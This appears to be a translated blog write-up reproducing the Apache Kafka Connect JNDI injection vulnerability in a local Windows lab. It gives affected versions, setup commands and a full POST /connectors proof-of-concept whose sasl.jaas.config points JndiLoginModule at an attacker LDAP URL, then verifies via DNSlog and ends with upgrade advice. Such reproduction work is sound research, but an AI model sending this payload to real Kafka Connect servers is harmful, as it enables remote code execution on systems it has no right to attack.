1. Product introduction
Kafka Connect is a tool for scalable and reliable streaming of data between Apache Kafka and other systems. It makes it simple to quickly define connectors that move large amounts of data into and out of Kafka. Kafka Connect can ingest entire databases or collect metrics from all application servers into Kafka topics, making data available for low-latency stream processing.
2. Vulnerability overview
There is a JNDI injection vulnerability in Apache Kafka Connect. When the attacker can access the Kafka Connect Worker and can create or modify the connector, by setting the sasl.jaas.config property to com.sun.security.auth.module.JndiLoginModule, and then It can lead to JNDI injection, causing RCE to require a lower version of JDK or an exploitation chain in the target Kafka Connect system.
3. Scope of influence
Affected version
2.3.0 <= Apache Kafka <= 3.3.2
unaffected version
Apache Kafka >= 3.4.0
4. Reproduce the environment
Windows10 builds Kafka2.4.0 integrated environment (build jdk and mysql environment by yourself)
I am using jdk-11.0.18_windows-x64_bin.exe (JDK8 is also available, JDK11 is recommended)
mysql 5.7.27
Kafka2.4.0 integrated environment download address: https://download.csdn.net/download/qq_41904294/87588240
5. Vulnerability recurrence
startup environment
bin\windows\zookeeper-server-start.bat config\zookeeper.properties
bin\windows\kafka-server-start.bat config\server.properties
bin\windows\connect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties
If an error is reported: "The input line is too long. The command syntax is incorrect". The reason for this problem is that the Windows command length supports up to 8192 characters. In the Kafka startup script, there are commands to concatenate classpath variables. The content of classpath is a concatenated string of absolute paths of each jar package. When the location of Kafka is relatively deep, that is, when the directory is relatively long, the length of the classpath will be too long.
Solution: Shorten the directory tree structure and put the Kafka installation directory directly under the root directory.
Visit the vulnerability environment to see if it is started
Burp captures packets to see if there are related dependencies
http://x.x.x.x:8083/connector-plugins
POC currently circulating on the Internet
POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821
{
"name": "xxx",
"config": {
"connector.class": "io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "127.0.0.1",
"database.port": "3306",
"database.user": "root",
"database.password": "xxxx",
"database.server.id": "xxxx",
"database.server.name": "xxxx",
"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
"database.history.kafka.topic": "xxxx", "database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://xxxx\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
POC principle: When creating the mysql connector, set the sasl.jaas.config property to com.sun.security.auth.module.JndiLoginModule, which can lead to JNDI injection
Use Dnslog echo to verify whether the vulnerability exists
An error was reported, check the error message of the vulnerability environment, indicating that the server time zone error cannot be recognized, I found a method on the Internet, and found some settings to modify the database time zone, set time_zone='+8:00'; this method, but it did not work after trying , and then read the article again, how to specify the database time zone when creating a connector
Add the configuration "database.serverTimezone" to solve it (I don't understand why the US time zone is specified here, and the elder brother who knows can give me some pointers)
"config": {
...
"database.serverTimezone": "America/Los_Angeles",
...
}
revalidate
The echo is successful, and the vulnerability exists
6. Repair suggestion
At present, there is an official updateable version. It is recommended that affected users upgrade to: Apache Kafka 3.4.0 and above.
Users who are temporarily unable to upgrade can mitigate this vulnerability by validating the Kafka Connect connector configuration to allow only trusted JNDI configurations.